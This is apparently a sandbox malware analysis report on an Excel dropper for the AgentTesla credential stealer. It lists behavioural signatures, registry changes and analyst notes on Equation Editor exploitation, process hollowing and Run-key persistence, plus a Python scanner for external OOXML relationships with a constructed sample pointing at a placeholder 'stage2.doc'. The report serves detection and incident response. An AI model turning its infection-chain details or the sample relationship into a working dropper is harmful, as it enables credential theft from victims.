Malware Analysis Report

2024-11-30 06:43

Sample ID 240604-b1at6she24
Target 85181e5805f7d9111755cb3afff215a156b86330bed4241c0383d7091e1dc8fc.xlsx
SHA256 85181e5805f7d9111755cb3afff215a156b86330bed4241c0383d7091e1dc8fc
Tags
agenttesla keylogger persistence spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

85181e5805f7d9111755cb3afff215a156b86330bed4241c0383d7091e1dc8fc

Threat Level: Known bad

The file 85181e5805f7d9111755cb3afff215a156b86330bed4241c0383d7091e1dc8fc.xlsx was found to be: Known bad.

Malicious Activity Summary

agenttesla keylogger persistence spyware stealer trojan

AgentTesla

Detects executables referencing Windows vault credential objects. Observed in infostealers.

Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers.

Detects executables referencing many confidential data stores found in browsers, mail clients, cryptocurrency wallets, etc. Observed in information stealers.

Detects executables referencing many email and collaboration clients. Observed in information stealers.

Detects executables referencing many file transfer clients. Observed in information stealers.

Detect packed .NET executables. Mostly AgentTeslaV4.

Downloads MZ/PE file

Blocklisted process makes network request

Reads WinSCP keys stored on the system

Reads user/profile data of web browsers

Reads user/profile data of local email clients

Abuses OpenXML format to download file from external location

Reads data files stored by FTP clients

Loads dropped DLL

Executes dropped EXE

Looks up external IP address via web service

Adds Run key to start application

Suspicious use of SetThreadContext

Office loads VBA resources, possible macro or embedded object present

Suspicious behavior: EnumeratesProcesses

Modifies registry class

Modifies Internet Explorer settings

Uses Task Scheduler COM API

Suspicious use of FindShellTrayWindow

Enumerates system info in registry

Suspicious use of AdjustPrivilegeToken

Launches Equation Editor

Suspicious use of WriteProcessMemory

Suspicious behavior: AddClipboardFormatListener

Suspicious use of SetWindowsHookEx

Checks processor information in registry

Uses Volume Shadow Copy WMI provider

Uses Volume Shadow Copy service COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-04 01:36

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-04 01:36

Reported

2024-06-04 01:38

Platform

win7-20240508-en

Max time kernel

144s

Max time network

125s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\85181e5805f7d9111755cb3afff215a156b86330bed4241c0383d7091e1dc8fc.xls

Signatures

AgentTesla

keylogger trojan stealer spyware agenttesla

Detect packed .NET executables. Mostly AgentTeslaV4.

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers.

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects executables referencing Windows vault credential objects. Observed in infostealers

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects executables referencing many confidential data stores found in browsers, mail clients, cryptocurrency wallets, etc. Observed in information stealers.

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects executables referencing many email and collaboration clients. Observed in information stealers

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects executables referencing many file transfer clients. Observed in information stealers

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Note: Equation Editor has no legitimate reason to open a network connection. Read together with the Downloads MZ/PE file, Loads dropped DLL and Executes dropped EXE entries (the DLL load is also attributed to EQNEDT32.EXE, and the EXE is igcc.exe), this is most likely the point at which the dropper is retrieved.

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE N/A

Downloads MZ/PE file

Abuses OpenXML format to download file from external location
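
The signature above fires on a relationship inside the package that points outside it. The scanner below is an added example, not part of the sandbox report or its tooling: it walks every *.rels part in an Office Open XML zip, reports relationships with TargetMode="External", and then narrows to the relationship types Office resolves and loads on its own (the LOADED_TYPES set is an assumption made for triage). The in-memory package it builds is a constructed stand-in for the submitted workbook; the example.invalid URLs are placeholders, not indicators from this report.

```python
"""Find relationships in an Office Open XML package that point outside it.

Added example for this report (not the sandbox's own tooling). The package
built by build_sample_package() is constructed to mimic the mechanism; it is
not the submitted workbook, and the example.invalid URLs are placeholders.
"""
import io
import sys
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"

# Relationship types whose external target Office fetches and loads by itself
# (as opposed to a hyperlink the user has to click). Assumed set for triage.
LOADED_TYPES = {"oleObject", "attachedTemplate", "frame", "subDocument", "image"}


def find_external_relationships(package: bytes) -> list:
    """Return every Relationship with TargetMode="External" in any *.rels part."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(package)) as zf:
        for name in zf.namelist():
            if not name.lower().endswith(".rels"):
                continue
            try:
                root = ET.fromstring(zf.read(name))
            except ET.ParseError:
                # A .rels part that does not parse is itself suspicious: record it.
                hits.append({"part": name, "id": None, "type": "unparseable", "target": None})
                continue
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal").lower() != "external":
                    continue
                hits.append({
                    "part": name,
                    "id": rel.get("Id"),
                    # keep only the last path segment of the Type URI
                    "type": rel.get("Type", "").rsplit("/", 1)[-1],
                    "target": rel.get("Target"),
                })
    return hits


def auto_loaded(hits: list) -> list:
    """Keep the external relationships Office resolves without user interaction."""
    return [h for h in hits if h["type"] in LOADED_TYPES or h["type"] == "unparseable"]


def build_sample_package() -> bytes:
    """Constructed minimal workbook: one benign hyperlink and one external OLE object."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("_rels/.rels",
                    f'<Relationships xmlns="{REL_NS}">'
                    f'<Relationship Id="rId1" Type="{OFFICE_REL}officeDocument" Target="xl/workbook.xml"/>'
                    '</Relationships>')
        zf.writestr("xl/worksheets/_rels/sheet1.xml.rels",
                    f'<Relationships xmlns="{REL_NS}">'
                    f'<Relationship Id="rId1" Type="{OFFICE_REL}hyperlink" '
                    'Target="https://example.invalid/benign" TargetMode="External"/>'
                    f'<Relationship Id="rId2" Type="{OFFICE_REL}oleObject" '
                    'Target="http://example.invalid/stage2.doc" TargetMode="External"/>'
                    '</Relationships>')
    return buf.getvalue()


if __name__ == "__main__":
    # Usage: python ooxml_external_rels.py suspicious.xlsx   (no argument: the sample)
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_package()
    for hit in auto_loaded(find_external_relationships(data)):
        print(f"{hit['part']}: {hit['id']} {hit['type']} -> {hit['target']}")
```

Run it against the real .xlsx before detonation: an oleObject or attachedTemplate relationship with an http(s) target is enough to treat the file as a downloader regardless of whether the remote part is still online.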

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\igcc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\igcc.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE N/A

Reads WinSCP keys stored on the system

spyware stealer

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Note: the value is written by igcc.exe but points at C:\Users\Admin\AppData\Roaming\mpTrle\mpTrle.exe, not at igcc.exe itself, so a host sweep has to cover both paths and the Run value name mpTrle; searching for igcc.exe alone misses the startup entry.
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Windows\CurrentVersion\Run\mpTrle = "C:\\Users\\Admin\\AppData\\Roaming\\mpTrle\\mpTrle.exe" C:\Users\Admin\AppData\Roaming\igcc.exe N/A

Looks up external IP address via web service

Note: api.ipify.org is a legitimate service; AgentTesla queries it to record the victim's public IP for its exfiltration report. Treat it as a context indicator (unexpected process, early in the chain) rather than as an IOC on its own.

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A

Suspicious use of SetThreadContext

Note: PID 1616 (igcc.exe) both writes into PID 800 (a second igcc.exe, see the WriteProcessMemory entries) and replaces its thread context. That pair is the process-hollowing pattern: the child is started suspended, its image overwritten with the unpacked payload and its entry point redirected, so the unpacked AgentTesla code is best recovered from the memory of PID 800 rather than from igcc.exe on disk.

Description Indicator Process Target
PID 1616 set thread context of 800 N/A C:\Users\Admin\AppData\Roaming\igcc.exe C:\Users\Admin\AppData\Roaming\igcc.exe

Office loads VBA resources, possible macro or embedded object present

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Launches Equation Editor

exploit
Note: EQNEDT32.EXE is not something Excel starts for a spreadsheet. It runs here with -Embedding, alongside WINWORD.EXE -Embedding, after the workbook's external relationship fetched a .doc (cached under Content.IE5 in the Files list), and it then writes into igcc.exe, the dropped executable (PID 528 -> 1616 under WriteProcessMemory). An Equation Editor process writing into a process under %APPDATA% is the single highest-confidence indicator in this report.
Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE N/A

Modifies Internet Explorer settings

adware spyware
Note: every row in this table is written by WINWORD.EXE or EXCEL.EXE from their Program Files paths and touches Office's own registrations (Default HTML/MHTML Editor, the "Export to Microsoft Excel" and "Send to OneNote" menu extensions). This is Office (re)registering its file handlers, not payload activity. The (data) values are UTF-16LE Windows Installer "Darwin descriptor" strings (compressed product code, feature name, ">" and component code, followed by the arguments), not command lines.
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\MenuExt C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Modifies registry class

Note: all of these writes come from WINWORD.EXE re-registering the .htm/.mht OpenWithList handlers for Word, Excel and Publisher and the msohevi.dll icon handler; the (data) values are UTF-16LE Windows Installer descriptors, not command lines. Nothing in this table is attributable to the payload.

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\ = "&Print" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\ShellEx C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\mhtmlfile C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\ = "&Print" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\htmlfile C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
